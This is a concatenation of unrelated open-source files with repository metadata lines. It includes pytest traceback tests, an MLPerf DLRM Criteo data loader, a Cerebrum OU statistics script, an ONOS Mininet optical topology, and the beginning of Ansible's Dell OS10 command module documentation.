if len(x) < len(str(path)):
assert line == "mod.py:3: ValueError"
repr = excinfo.getrepr(abspath=True)
repr.toterminal(tw)
line = tw.lines[-1]
assert line == "%s:3: ValueError" %(path,)
finally:
old.chdir()
@py.test.mark.multi(reproptions=[
{'style': style, 'showlocals': showlocals,
'funcargs': funcargs, 'tbfilter': tbfilter
} for style in ("long", "short", "no")
for showlocals in (True, False)
for tbfilter in (True, False)
for funcargs in (True, False)])
def test_format_excinfo(self, importasmod, reproptions):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = py.test.raises(ValueError, mod.f)
tw = py.io.TerminalWriter(stringio=True)
repr = excinfo.getrepr(**reproptions)
repr.toterminal(tw)
assert tw.stringio.getvalue()
def test_native_style(self):
excinfo = self.excinfo_from_exec("""
assert 0
""")
repr = excinfo.getrepr(style='native')
assert "assert 0" in str(repr.reprcrash)
s = str(repr)
assert s.startswith('Traceback (most recent call last):\n File')
assert s.endswith('\nAssertionError: assert 0')
assert 'exec (source.compile())' in s
# python 2.4 fails to get the source line for the assert
if py.std.sys.version_info >= (2, 5):
assert s.count('assert 0') == 2
def test_traceback_repr_style(self, importasmod):
mod = importasmod("""
def f():
g()
def g():
h()
def h():
i()
def i():
raise ValueError()
""")
excinfo = py.test.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
excinfo.traceback[1].set_repr_style("short")
excinfo.traceback[2].set_repr_style("short")
r = excinfo.getrepr(style="long")
tw = TWMock()
r.toterminal(tw)
for line in tw.lines: print (line)
assert tw.lines[0] == ""
assert tw.lines[1] == " def f():"
assert tw.lines[2] == "> g()"
assert tw.lines[3] == ""
assert tw.lines[4].endswith("mod.py:3: ")
assert tw.lines[5] == ("_ ", None)
assert tw.lines[6].endswith("in g")
assert tw.lines[7] == " h()"
assert tw.lines[8].endswith("in h")
assert tw.lines[9] == " i()"
assert tw.lines[10] == ("_ ", None)
assert tw.lines[11] == ""
assert tw.lines[12] == " def i():"
assert tw.lines[13] == "> raise ValueError()"
assert tw.lines[14] == "E ValueError"
assert tw.lines[15] == ""
assert tw.lines[16].endswith("mod.py:9: ValueError")
| mpl-2.0 |
mlperf/inference_results_v0.7 | closed/Atos/code/dlrm/tensorrt/scripts/data_loader_terabyte.py | 18 | 12309 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import numpy as np
from torch.utils.data import Dataset
import torch
import time
import math
from tqdm import tqdm
import argparse
class DataLoader:
"""
DataLoader dedicated for the Criteo Terabyte Click Logs dataset
"""
def __init__(
self,
data_filename,
data_directory,
days,
batch_size,
max_ind_range=-1,
split="train",
drop_last_batch=False
):
self.data_filename = data_filename
self.data_directory = data_directory
self.days = days
self.batch_size = batch_size
self.max_ind_range = max_ind_range
total_file = os.path.join(
data_directory,
data_filename + "_day_count.npz"
)
with np.load(total_file) as data:
total_per_file = data["total_per_file"][np.array(days)]
self.length = sum(total_per_file)
if split == "test" or split == "val":
self.length = int(np.ceil(self.length / 2.))
self.split = split
self.drop_last_batch = drop_last_batch
def __iter__(self):
return iter(
_batch_generator(
self.data_filename, self.data_directory, self.days,
self.batch_size, self.split, self.drop_last_batch, self.max_ind_range
)
)
def __len__(self):
if self.drop_last_batch:
return self.length // self.batch_size
else:
return math.ceil(self.length / self.batch_size)
def _transform_features(
x_int_batch, x_cat_batch, y_batch, max_ind_range, flag_input_torch_tensor=False
):
if max_ind_range > 0:
x_cat_batch = x_cat_batch % max_ind_range
if flag_input_torch_tensor:
x_int_batch = torch.log(x_int_batch.clone().detach().type(torch.float) + 1)
x_cat_batch = x_cat_batch.clone().detach().type(torch.long)
y_batch = y_batch.clone().detach().type(torch.float32).view(-1, 1)
else:
x_int_batch = torch.log(torch.tensor(x_int_batch, dtype=torch.float) + 1)
x_cat_batch = torch.tensor(x_cat_batch, dtype=torch.long)
y_batch = torch.tensor(y_batch, dtype=torch.float32).view(-1, 1)
batch_size = x_cat_batch.shape[0]
feature_count = x_cat_batch.shape[1]
lS_o = torch.arange(batch_size).reshape(1, -1).repeat(feature_count, 1)
return x_int_batch, lS_o, x_cat_batch.t(), y_batch.view(-1, 1)
def _batch_generator(
data_filename, data_directory, days, batch_size, split, drop_last, max_ind_range
):
previous_file = None
for day in days:
filepath = os.path.join(
data_directory,
data_filename + "_{}_reordered.npz".format(day)
)
# print('Loading file: ', filepath)
with np.load(filepath) as data:
x_int = data["X_int"]
x_cat = data["X_cat"]
y = data["y"]
samples_in_file = y.shape[0]
batch_start_idx = 0
if split == "test" or split == "val":
length = int(np.ceil(samples_in_file / 2.))
if split == "test":
samples_in_file = length
elif split == "val":
batch_start_idx = samples_in_file - length
while batch_start_idx < samples_in_file - batch_size:
missing_samples = batch_size
if previous_file is not None:
missing_samples -= previous_file['y'].shape[0]
current_slice = slice(batch_start_idx, batch_start_idx + missing_samples)
x_int_batch = x_int[current_slice]
x_cat_batch = x_cat[current_slice]
y_batch = y[current_slice]
if previous_file is not None:
x_int_batch = np.concatenate(
[previous_file['x_int'], x_int_batch],
axis=0
)
x_cat_batch = np.concatenate(
[previous_file['x_cat'], x_cat_batch],
axis=0
)
y_batch = np.concatenate([previous_file['y'], y_batch], axis=0)
previous_file = None
if x_int_batch.shape[0] != batch_size:
raise ValueError('should not happen')
yield _transform_features(x_int_batch, x_cat_batch, y_batch, max_ind_range)
batch_start_idx += missing_samples
if batch_start_idx != samples_in_file:
current_slice = slice(batch_start_idx, samples_in_file)
if previous_file is not None:
previous_file = {
'x_int' : np.concatenate(
[previous_file['x_int'], x_int[current_slice]],
axis=0
),
'x_cat' : np.concatenate(
[previous_file['x_cat'], x_cat[current_slice]],
axis=0
),
'y' : np.concatenate([previous_file['y'], y[current_slice]], axis=0)
}
else:
previous_file = {
'x_int' : x_int[current_slice],
'x_cat' : x_cat[current_slice],
'y' : y[current_slice]
}
if not drop_last:
yield _transform_features(
previous_file['x_int'],
previous_file['x_cat'],
previous_file['y'],
max_ind_range
)
def _test():
generator = _batch_generator(
data_filename='day',
data_directory='/input',
days=range(23),
split="train",
batch_size=2048
)
t1 = time.time()
for x_int, lS_o, x_cat, y in generator:
t2 = time.time()
time_diff = t2 - t1
t1 = t2
print(
"time {} x_int.shape: {} lS_o.shape: {} x_cat.shape: {} y.shape: {}".format(
time_diff, x_int.shape, lS_o.shape, x_cat.shape, y.shape
)
)
class CriteoBinDataset(Dataset):
"""Binary version of criteo dataset."""
def __init__(self, data_file, counts_file,
batch_size=1, max_ind_range=-1, bytes_per_feature=4):
# dataset
self.tar_fea = 1 # single target
self.den_fea = 13 # 13 dense features
self.spa_fea = 26 # 26 sparse features
self.tad_fea = self.tar_fea + self.den_fea
self.tot_fea = self.tad_fea + self.spa_fea
self.batch_size = batch_size
self.max_ind_range = max_ind_range
self.bytes_per_entry = (bytes_per_feature * self.tot_fea * batch_size)
self.num_entries = math.ceil(os.path.getsize(data_file) / self.bytes_per_entry)
print('data file:', data_file, 'number of batches:', self.num_entries)
self.file = open(data_file, 'rb')
with np.load(counts_file) as data:
self.counts = data["counts"]
# hardcoded for now
self.m_den = 13
def __len__(self):
return self.num_entries
def __getitem__(self, idx):
self.file.seek(idx * self.bytes_per_entry, 0)
raw_data = self.file.read(self.bytes_per_entry)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return _transform_features(x_int_batch=tensor[:, 1:14],
x_cat_batch=tensor[:, 14:],
y_batch=tensor[:, 0],
max_ind_range=self.max_ind_range,
flag_input_torch_tensor=True)
def numpy_to_binary(input_files, output_file_path, split='train'):
"""Convert the data to a binary format to be read with CriteoBinDataset."""
# WARNING - both categorical and numerical data must fit into int32 for
# the following code to work correctly
with open(output_file_path, 'wb') as output_file:
if split == 'train':
for input_file in input_files:
print('Processing file: ', input_file)
np_data = np.load(input_file)
np_data = np.concatenate([np_data['y'].reshape(-1, 1),
np_data['X_int'],
np_data['X_cat']], axis=1)
np_data = np_data.astype(np.int32)
output_file.write(np_data.tobytes())
else:
assert len(input_files) == 1
np_data = np.load(input_files[0])
np_data = np.concatenate([np_data['y'].reshape(-1, 1),
np_data['X_int'],
np_data['X_cat']], axis=1)
np_data = np_data.astype(np.int32)
samples_in_file = np_data.shape[0]
midpoint = int(np.ceil(samples_in_file / 2.))
if split == "test":
begin = 0
end = midpoint
elif split == "val":
begin = midpoint
end = samples_in_file
else:
raise ValueError('Unknown split value: ', split)
output_file.write(np_data[begin:end].tobytes())
def _preprocess(args):
train_files = ['{}_{}_reordered.npz'.format(args.input_data_prefix, day) for
day in range(0, 23)]
test_valid_file = args.input_data_prefix + '_23_reordered.npz'
os.makedirs(args.output_directory, exist_ok=True)
for split in ['train', 'val', 'test']:
print('Running preprocessing for split =', split)
output_file = os.path.join(args.output_directory,
'{}_data.bin'.format(split))
input_files = train_files if split == 'train' else [test_valid_file]
numpy_to_binary(input_files=input_files,
output_file_path=output_file,
split=split)
def _test_bin():
parser = argparse.ArgumentParser()
parser.add_argument('--output_directory', required=True)
parser.add_argument('--input_data_prefix', required=True)
parser.add_argument('--split', choices=['train', 'test', 'val'],
required=True)
args = parser.parse_args()
# _preprocess(args)
binary_data_file = os.path.join(args.output_directory,
'{}_data.bin'.format(args.split))
counts_file = os.path.join(args.output_directory, 'day_fea_count.npz')
dataset_binary = CriteoBinDataset(data_file=binary_data_file,
counts_file=counts_file,
batch_size=2048,)
from dlrm_data_pytorch import CriteoDataset, collate_wrapper_criteo
binary_loader = torch.utils.data.DataLoader(
dataset_binary,
batch_size=None,
shuffle=False,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
)
original_dataset = CriteoDataset(
dataset='terabyte',
max_ind_range=10 * 1000 * 1000,
sub_sample_rate=1,
randomize=True,
split=args.split,
raw_path=args.input_data_prefix,
pro_data='dummy_string',
memory_map=True
)
original_loader = torch.utils.data.DataLoader(
original_dataset,
batch_size=2048,
shuffle=False,
num_workers=0,
collate_fn=collate_wrapper_criteo,
pin_memory=False,
drop_last=False,
)
assert len(dataset_binary) == len(original_loader)
for i, (old_batch, new_batch) in tqdm(enumerate(zip(original_loader,
binary_loader)),
total=len(dataset_binary)):
for j in range(len(new_batch)):
if not np.array_equal(old_batch[j], new_batch[j]):
raise ValueError('FAILED: Datasets not equal')
if i > len(dataset_binary):
break
print('PASSED')
if __name__ == '__main__':
_test()
_test_bin
| apache-2.0 |
unioslo/cerebrum | contrib/no/uio/user_per_sko.py | 1 | 20843 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2004 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import unicode_literals
"""
This file is a UiO-specific extensions of Cerebrum.
It provides user/person statistics about various organizational units (OUs)
at the UiO. The script provides statistics at various granularity levels
(--level option).
--level fakultet produces statistics grouped by faculty (fakultet). A
faculty of a given OU is the first OU in the OU hierarchy that has
(institutt, avdeling) == (0. 0). For all OUs that do not have such
parents, the stats are grouped together under the same tag.
--level institutt produces statistics grouped by department (institutt). A
department of a given OU is the first OU in the OU hierarchy that has
avdeling = 0. For all OUs that do not have such parents, the stats are
grouped together under the same tag.
--level gruppe produces statistics with each OU taking as is, without any
parent lookup.
"""
import argparse
import copy
import types
import locale
from six import text_type
from Cerebrum.Utils import Factory
logger = None
def make_ou_to_stedkode_map(db):
"""
Returns a dictionary mapping ou_ids to (fak,inst,avd) triplets
(stedkoder).
"""
ou = Factory.get("OU")(db)
result = dict()
for row in ou.get_stedkoder():
result[int(row["ou_id"])] = (int(row["fakultet"]),
int(row["institutt"]),
int(row["avdeling"]))
logger.debug("%d ou -> stedkode mappings", len(result))
return result
def make_ou_to_parent_map(perspective, db):
"""
Returns a dictionary mapping ou_ids to their parent ids (or None, if no
parent exists) in a given PERSPECTIVE (FS, LT, etc.)
"""
ou = Factory.get("OU")(db)
result = dict()
for item in ou.get_structure_mappings(perspective):
if item["parent_id"] is not None:
parent_id = int(item["parent_id"])
else:
parent_id = None
result[int(item["ou_id"])] = parent_id
logger.debug("%d ou -> parent mappings", len(result))
return result
#
# sko for all OUs that we cannot classify.
__undef_ou = "andre"
def locate_ou(ou_id, ou2parent, ou2stedkode, level):
"""
Return a suitable parent of OU_ID.
LEVEL determines how far up the hierarchy we are walking.
0 means the entity itself
1 means the closest parent with avdeling part of the sko == 0
2 means the closest parent with avdeling and institutt part of
the sko == 0.
Should we reach the top of the hierarchy without finding a suitable
(parent) OU, a special value is returned. The statistics for that group
will be cumulative for _all_ OU_ID that have no suitable (parent) OU.
"""
ou_id = int(ou_id)
# If level == oneself, just return the ou_id
if level == 0:
return ou2stedkode[ou_id]
tmp = ou_id
while 1:
if tmp is None:
# We reached the top of the hierarchy without seeing anything
# suitable
logger.debug("ou_id %d has no proper parent", ou_id)
return __undef_ou
if tmp not in ou2stedkode:
logger.warn("Cannot locate sko for ou_id %s. Assuming undef", tmp)
return __undef_ou
tmp_sko = ou2stedkode[tmp]
# extract the right part of the sko
if tmp_sko[3-level:] == (0,)*level:
return tmp_sko
# ... or continue with parent
tmp = ou2parent.get(tmp)
def display_statistics(statistics):
"""
STATISTICS is a dictionary indexed by faculty numbers (K) and with
values (V) being dictionaries with statistics information.
This function assumes that _all_ Vs have the exactly same set of keys.
"""
logger.debug("Statistics:")
# The keys we are interested in
keys = ('ansatt', 'student', 'a&s', 'tilknyttet', 'manuell', 'alle manuell')
nosum = ('alle manuell')
# Dictionary for totalling up numbers per affiliation
total = dict([(key, 0) for key in keys])
faculty_keys = statistics.keys()
# Order the faculty output by sko
faculty_keys.sort()
# Yes, the code is ugly, but people do not like
# pprint.print(dictionary)
fak_width = 14
field_width = 10
fak_underline = u"-" * fak_width + u"+"
field_underline = u"-" * field_width + u"+"
fak_format = u"%%%ds" % fak_width
field_format = u"%%%ds" % field_width
values = (u"navn",) + tuple([x[0:field_width] for x in keys])
enc = locale.getpreferredencoding()
print (((fak_format + u"|") % u"fak") +
((field_format + u"|") * len(values)) % values).encode(enc)
print (u"%s%s" % (fak_underline, field_underline * len(values))).encode(enc)
def output_fak(faculty, value):
if isinstance(faculty, types.TupleType):
faculty_text = u"%02d%02d%02d" % faculty
else:
faculty_text = faculty
message = ((fak_format % faculty_text) +
(u"|" + field_format) % value["name"][0:field_width])
for key in keys:
message += "|" + field_format % value[key]
print message.encode(enc)
for faculty in faculty_keys:
value = statistics[faculty]
if 'cum' in value:
value['cum']['name'] = u'totalsum'
if isinstance(faculty, types.TupleType):
text = u'%02d****' % faculty[0]
else:
text = faculty + u' *'
# print (u"%s%s" % (fak_underline,
# field_underline * len(values))).encode(enc)
output_fak(text, value['cum'])
output_fak(faculty, value)
for key in keys:
total[key] += value[key]
print ("%s%s" % (fak_underline, field_underline * len(values))).encode(enc)
message = (fak_format + u"|") % u"Total" + (field_format + u"|") % u"--"
summa = 0
nosumma = 0
for key in keys:
message += (field_format + u"|") % total[key]
if key not in nosum:
summa += total[key]
else:
nosumma += total[key]
print message.encode(enc), (field_format % '{} (+{})'.format(summa, nosumma)
.encode(enc))
def purge_0rows(statistics):
for key in statistics.keys():
val = statistics[key]
cum = val.get('cum')
empty = not any((val[k] for k in val.keys() if k not in ('cum',
'name')))
if cum and empty and any((cum[k] for k in cum.keys() if k != 'name')):
cum['name'] = u'totalsum'
if isinstance(key, types.TupleType):
name = u'%02d****' % key[0]
else:
name = u'%s *' % key
statistics[name] = cum
if empty:
del statistics[key]
return statistics
def make_empty_statistics(level, db, extra_fak_sum=False):
"""
Return an empty dictionary suitable for statistics collection.
Depending on the LEVEL, we'll have a different number of keys in
STATISTICS.
"""
fakultet, institutt, avdeling = None, None, None
if level > 0:
avdeling = 0
if level > 1:
institutt = 0
ou = Factory.get("OU")(db)
sko = ou.get_stedkoder(fakultet=fakultet, institutt=institutt,
avdeling=avdeling)
const = Factory.get("Constants")()
statistics = dict()
# "Unspecified" stats.
statistics[__undef_ou] = {"name": u"undef", 'cum': dict()}
for row in sko:
ou_sko = (int(row["fakultet"]),
int(row["institutt"]),
int(row["avdeling"]))
ou.clear()
ou.find(row["ou_id"])
acronyms = ou.search_name_with_language(
entity_id=ou.entity_id, name_variant=const.ou_name_acronym)
if acronyms:
ou_name = acronyms[0]["name"]
else:
names = ou.search_name_with_language(entity_id=ou.entity_id,
name_variant=const.ou_name)
if names:
ou_name = names[0]["name"]
else:
ou_name = u"N/A"
statistics[ou_sko] = {"name": ou_name}
if extra_fak_sum and ou_sko[1] == ou_sko[2] == 0:
statistics[ou_sko]['cum'] = dict()
for key in statistics.keys():
value = {"ansatt": 0,
"a&s": 0,
"student": 0,
"tilknyttet": 0,
"manuell": 0,
"kun manuell": 0,
"alle manuell": 0,
None: 0,
}
statistics[key].update(value)
if 'cum' in statistics[key]:
statistics[key]['cum'].update(value)
logger.debug("Generating stats for %d top-level OUs" % len(statistics))
return statistics
def make_affiliation_priorities(const):
"""
Prepares and returns a dictionary sorting affiliations/stati according
to this ruleset:
When associating an entity with a faculty during statistics collection,
we have to break ties. The ties are broken in the following fashion:
1. First we compare affiliation; they are classified in this order
ansatt, student, tilknyttet, manuell
2. If an entity has two affiliations of the same type, affiliation
status is used to break up ties in this order:
ansatt -> vitenskaplig, tekadm, bilag, permisjon
student -> aktiv, evu, alumni, perm, opptak, tilbud, soker, privatist
tilknyttet -> emeritus, ekst_forsker, ekst_stip, fagperson, bilag,
gjesteforsker, sivilarbeider, diverse
manuell -> don't care
For the latter two, we just select one entry. Does not matter which
one (this might mean though that statistics run one after the other
might fluctuate. Blame baardj for imprecise specification.
The dictionary uses affiliations as keys. Each value is in turn a
dictionary D, sorting that affiliation's stati. D has at least two
(key,value) pairs -- 'name' and 'value', holding that affiliation's name
and relative sort order.
"""
return {
int(const.affiliation_ansatt): {
"name": "ansatt",
"value": 0,
int(const.affiliation_status_ansatt_vit): 0,
int(const.affiliation_status_ansatt_tekadm): 1,
int(const.affiliation_status_ansatt_bil): 2,
int(const.affiliation_status_ansatt_perm): 3
},
int(const.affiliation_student): {
"name": "student",
"value": 1,
int(const.affiliation_status_student_aktiv): 0,
int(const.affiliation_status_student_evu): 1,
int(const.affiliation_status_student_alumni): 2,
int(const.affiliation_status_student_perm): 3,
int(const.affiliation_status_student_opptak): 4,
int(const.affiliation_status_student_tilbud): 5,
int(const.affiliation_status_student_soker): 6,
int(const.affiliation_status_student_privatist): 7,
},
int(const.affiliation_tilknyttet): {
"name": "tilknyttet",
"value": 2,
int(const.affiliation_tilknyttet_emeritus): 0,
int(const.affiliation_tilknyttet_ekst_forsker): 1,
int(const.affiliation_tilknyttet_ekst_stip): 2,
int(const.affiliation_tilknyttet_fagperson): 3,
int(const.affiliation_tilknyttet_bilag): 4,
int(const.affiliation_tilknyttet_gjesteforsker): 5,
int(const.affiliation_tilknyttet_sivilarbeider): 6,
int(const.affiliation_tilknyttet_diverse): 7,
},
int(const.affiliation_manuell): {
"name": "manuell",
"value": 3,
},
}
def generate_people_statistics(perspective, empty_statistics, level, db,
fak_cum=False):
"""
Collect statistics about people.
PERSPECTIVE determines how we view the OU hierarchy (FS, LT, etc)
EMPTY_STATISTICS is a dictionary with default stat values.
LEVEL designates how far up OU hierarchy we walk
The strategy is pretty straightforward:
for each person P
look at P's affiliations A
sort them according to the rules in make_affiliation_priorities
select the first affiliation FA
register P's contribution under the suitable OU derived from FA.ou_id
and affiliation derived from FA.affiliation
done
This will ensure that each person is counted only once, despite having
multiple affiliations to multiple faculties.
NB! A silly thing is that the ruleset is incomplete. Harass baardj for a
more complete specification.
"""
person = Factory.get("Person")(db)
const = Factory.get("Constants")(db)
ou2stedkode = make_ou_to_stedkode_map(db)
ou2parent = make_ou_to_parent_map(perspective, db)
statistics = copy.deepcopy(empty_statistics)
# Cache processed entities
processed = set()
# Sort order for affiliations/stati
order = make_affiliation_priorities(const)
for row in person.list_affiliations(fetchall=False):
id = int(row["person_id"])
if id in processed:
continue
else:
processed.add(id)
affiliations = person.list_affiliations(person_id=id)
# If there are no affiliations, this person contributes nothing to
# the statistics.
if not affiliations:
continue
affiliations.sort(lambda x, y:
cmp(order[x["affiliation"]],
order[y["affiliation"]])
or cmp(order.get(x["status"], 0),
order.get(y["status"], 0)))
aff = affiliations[0]
ou_result = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, level)
if fak_cum:
ou_cum = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, 2)
# a&s (ansatt og student) has a special rule
affs = [x["affiliation"] for x in affiliations]
if (const.affiliation_student in affs and
const.affiliation_ansatt in affs):
affiliation_name = "a&s"
else:
affiliation_name = order[aff["affiliation"]]["name"]
statistics[ou_result][affiliation_name] += 1
if fak_cum:
statistics[ou_cum]['cum'][affiliation_name] += 1
return statistics
def generate_account_statistics(perspective, empty_statistics, level, db,
extra_cum=False):
"""
Collect statistics about accounts.
for each account A
look at A's affiliations F
sort them according to the rules in make_affiliation_priorities
(and by using priority to break ties)
select the first affiliation FA
register A's contribution under a suitable OU derived from FA.ou_id and
affiliation derived from FA.affiliation
done
"""
account = Factory.get("Account")(db)
const = Factory.get("Constants")(db)
ou2stedkode = make_ou_to_stedkode_map(db)
ou2parent = make_ou_to_parent_map(perspective, db)
statistics = copy.deepcopy(empty_statistics)
# sort order for affiliations
order = make_affiliation_priorities(const)
# Keep track of accounts that had been processed
processed = set()
for row in account.list_accounts_by_type(fetchall=False):
if int(row["account_id"]) in processed:
continue
else:
processed.add(int(row["account_id"]))
affiliations = account.list_accounts_by_type(
account_id=row["account_id"],
filter_expired=True,
fetchall=True)
# Affiliations have already been ordered according to priority. Just
# pick the first one.
if not affiliations:
continue
manual_only = all((x['affiliation'] == const.affiliation_manuell
for x in affiliations))
manual = [x for x in affiliations
if x['affiliation'] == const.affiliation_manuell]
if manual and not manual_only:
for a in affiliations:
if a['affiliation'] != const.affiliation_manuell:
aff = a
break
else:
aff = affiliations[0]
ou_result = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, level)
if extra_cum:
ou_cum = locate_ou(aff["ou_id"], ou2parent, ou2stedkode, 2)
affs = [x["affiliation"] for x in affiliations]
if (const.affiliation_student in affs and
const.affiliation_ansatt in affs):
affiliation_name = "a&s"
else:
affiliation_name = order[aff["affiliation"]]["name"]
try:
statistics[ou_result][affiliation_name] += 1
if extra_cum:
statistics[ou_cum]['cum'][affiliation_name] += 1
if manual_only:
statistics[ou_result]['kun manuell'] += 1
if extra_cum:
statistics[ou_cum]['cum']['kun manuell'] += 1
except:
logger.error("ou_result = %s (%s; %s);",
ou_result, ou_result in statistics,
text_type(aff.ou_id))
raise
for aff in manual:
ou_result = locate_ou(aff['ou_id'], ou2parent, ou2stedkode, level)
try:
statistics[ou_result]['alle manuell'] += 1
if extra_cum:
statistics[locate_ou(aff['ou_id'],
ou2parent,
ou2stedkode,
2)]['cum']['alle manuell'] += 1
except:
logger.error('ou_result = %s (%s; %s); (for manual)',
ou_result, ou_result in statistics,
text_type(aff.ou_id))
return statistics
def main():
global logger
logger = Factory.get_logger("cronjob")
logger.info("Statistics for OUs at UiO")
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--people', action='store_true',
help='Get people statistics')
ap.add_argument('-u', '--users', action='store_true',
help='Get user statistics')
ap.add_argument('-l', '--level', action='store',
choices=('fakultet', 'institutt', 'gruppe'),
required=True,
help='The granularity of the report')
ap.add_argument('-c', '--cumulate', action='store_true',
help='Add cumulated results to faculty')
ap.add_argument('-e', '--perspective', action='store',
choices=('FS', 'SAP', 'LT'),
required=True,
help='OU perspective to use')
ap.add_argument('-k', '--keep', action='store_true',
help='Keep all zero rows')
args = ap.parse_args()
db = Factory.get("Database")()
const = Factory.get("Constants")(db)
level = {"fakultet": 2, "institutt": 1, "gruppe": 0}[args.level]
perspective = {
"FS": const.perspective_fs,
"SAP": const.perspective_sap,
"LT": const.perspective_lt
}[args.perspective]
cum = args.cumulate
if args.people:
people_result = generate_people_statistics(
perspective,
make_empty_statistics(level, db, cum), level, db, cum)
if not args.keep:
purge_0rows(people_result)
display_statistics(people_result)
if args.users:
users_result = generate_account_statistics(
perspective,
make_empty_statistics(level, db, cum), level, db, cum)
if not args.keep:
purge_0rows(users_result)
display_statistics(users_result)
if __name__ == '__main__':
main()
| gpl-2.0 |
packet-tracker/onos-1.2.0-custom-build | tools/test/topos/optical2.py | 19 | 2477 | #!/usr/bin/env python
''' file: custom/optical.py '''
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel, info
from mininet.link import Intf, Link
from mininet.node import RemoteController
class NullIntf( Intf ):
"A dummy interface with a blank name that doesn't do any configuration"
def __init__( self, name, **params ):
self.name = ''
class NullLink( Link ):
"A dummy link that doesn't touch either interface"
def makeIntfPair( cls, intf1, intf2, *args, **kwargs ):
pass
def delete( self ):
pass
class OpticalTopo(Topo):
def addIntf( self, switch, intfName ):
"Add intf intfName to switch"
self.addLink( switch, switch, cls=NullLink,
intfName1=intfName, cls2=NullIntf )
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Add hosts and switches
h1 = self.addHost('h1')
h2 = self.addHost('h2')
h3 = self.addHost('h3')
h4 = self.addHost('h4')
h5 = self.addHost('h5')
h6 = self.addHost('h6')
s1 = self.addSwitch('s1', dpid="0000ffffffff0001")
s2 = self.addSwitch('s2', dpid="0000ffffffff0002")
s3 = self.addSwitch('s3', dpid="0000ffffffff0003")
s4 = self.addSwitch('s4', dpid="0000ffffffff0004")
s5 = self.addSwitch('s5', dpid="0000ffffffff0005")
s6 = self.addSwitch('s6', dpid="0000ffffffff0006")
# Add links from hosts to OVS
self.addLink(s1, h1)
self.addLink(s2, h2)
self.addLink(s3, h3)
self.addLink(s4, h4)
self.addLink(s5, h5)
self.addLink(s6, h6)
# add links from ovs to linc-oe
# sorry about the syntax :(
self.addIntf(s1,'tap29')
self.addIntf(s2,'tap30')
self.addIntf(s3,'tap31')
self.addIntf(s4,'tap32')
self.addIntf(s5,'tap33')
self.addIntf(s6,'tap34')
# if you use, sudo mn --custom custom/optical.py, then register the topo:
topos = {'optical': ( lambda: OpticalTopo() )}
def run():
c = RemoteController('c','127.0.0.1',6653)
net = Mininet( topo=OpticalTopo(),controller=None,autoSetMacs=True)
net.addController(c)
net.start()
#installStaticFlows( net )
CLI( net )
net.stop()
# if the script is run directly (sudo custom/optical.py):
if __name__ == '__main__':
setLogLevel('info')
run()
| apache-2.0 |
dav1x/ansible | lib/ansible/modules/network/dellos10/dellos10_command.py | 46 | 7522 | #!/usr/bin/python
#
# (c) 2015 Peter Sprygada, <[email protected]>
#
# Copyright (c) 2017 Dell Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: dellos10_command
version_added: "2.2"
author: "Senthil Kumar Ganesan (@skg-net)"
short_description: Run commands on remote devices running Dell OS10
description:
- Sends arbitrary commands to a Dell OS10 node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(dellos10_config) to configure Dell OS10 devices.
extends_documentation_fragment: dellos10
options:
commands:
description:
- List of commands to send to the remote dellos10 device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of I(retries), the task fails.
See examples.
required: false
default: null
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
vars:
cli:
host: "{{ inventory_hostname }}"
username: admin
password: admin
transport: cli
tasks:
- name: run show version on remote devices
dellos10_command:
commands: show version
provider: "{{ cli }}"
- name: run show version and check to see if output contains OS10
dellos10_command:
commands: show version
wait_for: result[0] contains OS10
provider: "{{ cli }}"
- name: run multiple commands on remote nodes
dellos10_command:
commands:
- show version
- show interface
provider: "{{ cli }}"
- name: run multiple commands and evaluate the output
dellos10_command:
commands:
- show version
- show interface
wait_for:
- result[0] contains OS10
- result[1] contains Ethernet
provider: "{{ cli }}"
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always apart from low level errors (such as action plugin)
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always apart from low level errors (such as action plugin)
type: list
